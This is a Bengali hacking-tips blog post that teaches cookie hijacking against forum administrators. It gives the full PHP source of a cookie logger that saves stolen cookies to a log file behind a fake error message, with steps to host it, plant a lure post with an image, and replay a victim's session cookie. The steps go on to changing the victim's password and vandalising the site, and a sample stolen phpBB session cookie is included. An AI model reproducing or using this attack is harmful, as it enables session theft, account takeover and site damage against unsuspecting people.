কুকি হাইজাকিং এমন একটা হ্যাকিং মেথোড যেটার দ্বারা অনেক গুরুত্বপুর্ন ও বড় বড় কিছু হ্যাক করা যায় । এর মাধ্যমে অন্যের পাসওয়ার্ড পেয়ে তুমি হ্যাকিং শুরু করে দিলে ।
ধরো ভিকটিম ফেসবুক, গুগল সহ অনেক যায়গায় ব্রাউজিং করে এবং ওইসব তথ্য তার ব্রাউজারে সেভ থাকে । তুমি যদি কারো কুকি পাও তাহলে তার অনলাইনের সব কিছুই হ্যাক করতে পারবে ।
কুকিলগার কি?
কুকি লগার এমন একটা জিনিস যেটা একটা সাধারন PHP স্কিপ্ট দ্বারা তৈরি করা হয় ।
এটার দ্বারা যে কারো তথ্য চুরি করে একটা লগ ফাইলে সেভ করে রাখা যায় ।
আজ আমি আপনাদের দেখাবো কি করে নিজের একটা কুকি লগার তৈরি করতে হয় । আশা রাখি আপনারা অনেক ভালো করে উপভোগ করবেন ।
Step 1: নিচের লিন্ক থেকে ফাইলটা ডাউনলোড করুন এবং এটাকে রিনেম করে Tipstune.gif: নাম দিন ।
Download it.
http://www.crocko.com/1702516956.html
Step 2: এখন নিচের কোডটা কপি করে Notepad এ পেস্ট করুন এবং এটাকে সেভ করুন cookielogger.php: নামে ।
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary ServerError,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” .$_GET["cookie"]) === FALSE)
{
echo “Temporary ServerError,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary ServerError,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary ServerError,Sorry for the inconvenience.”;
exit;
?>Step 3: আবারো নতুন করে Notepad ওপেন করে কিছু না লিখে ওটাকে logfile.txt নামে সেভ করুন ।
Step 4: এবার ফাইলগুলা আপনার যে কোন একটা হোস্টিং এ আপলোড দেন । সবথেকে ভালো হয় যদি পেইড হোস্টিং থাকে ।
ফাইলগুলার লিন্ক দেখতে নিচের মত হবে ।
* cookielogger.php ->
http://www.yoursite.com /cookielogger.php
*logfile.txt ->
http://www.yoursite.com /logfile.txt
*Tipstune.gif ->
http://www.yoursite.com /fun.gif
Step 5: এবার ধরুন আপনি একটি ফোরাম সাইটের এডমিনের কুকি হাইজাকিং করবেন । তাহলেঃ তার ফোরাম সাইটে গিয়ে নিচের কোডটা কপি পেস্ট করে একটা পোস্ট করুন ।
Download it.
http://www.crocko.com/1702516964.html
Step 6: এবায় যখন ওই এডমিন উক্ত পোস্টা দেখবে তখন সে তোমার ওই ইমেজটা দেখবে । এবং কৈতুহল বশত ওটাতে ক্লিক করবে । সে যখনই ক্লিক করবে তখনই একটা Eror ম্যাসেজ দেখাবে । ব্যাস তার অজান্তেই কুকি গুলা হাইজাক হয়ে গেলো । কুকি গুলা log.txt ফাইলে পাবে ।
কুকি দেখতে নিচের মত হবে ।
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9Step 7: ভিকটিমের এক্যাউন্ট হ্যাক করে অনুমতি পাবার জন্য একটা ছোট্ট কাজ করতে হবে । আর সেটা হলোঃ তোমার কুকির সাথে ভিকটিমের কুকি Replace করতে হবে ।
এই কাজের জন্য Cookie Editor টুলসটা ব্যাবহার করতে পারো ।
“=” চিহ্ন এর আগের টুকু কুকির নাম । এবং “=” এই চিহ্ন এর পরেরটুকু কুকির ভ্যালু ।
সুতরাং Cookie Editor এ কুকির ভ্যালুটা চেন্জ করতে হবে ।
Step 8: এখন সেই ফোরাম সাইটে যাও । যেটা তুমি হ্যাক করতে চেয়েছিলে । দেখবে তুমি লগইন অবস্থায় আছো । এখন আস্তে করে পাসওয়ার্ডটা চেন্জ করে ফেলো আর সাইটকে একটা ছোট্ট বাঁশ দিয়ে চলে এসো ।
Note : তবে ভিকটিম যদি সাইটে লগআউট করে দেয় তাহলে তোমারও লগআউট হয়ে যাবে । তবে তুমি যদি একবার পাসওয়ার্ড চেন্জ করে ফেলতে পারো তাহলে আর বারবার কষ্ট করা লাগবে না ।
Disclaimer: এই হ্যাকিং এর জন্য 0ld D3vil, Md sagor, tipstune, H@ck1ng Sch00l আমরা কেওই দায়ি থাকবো না । কারন এটা আপনি নিজ দায়িত্বে ব্যাবহার করবেন ।
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.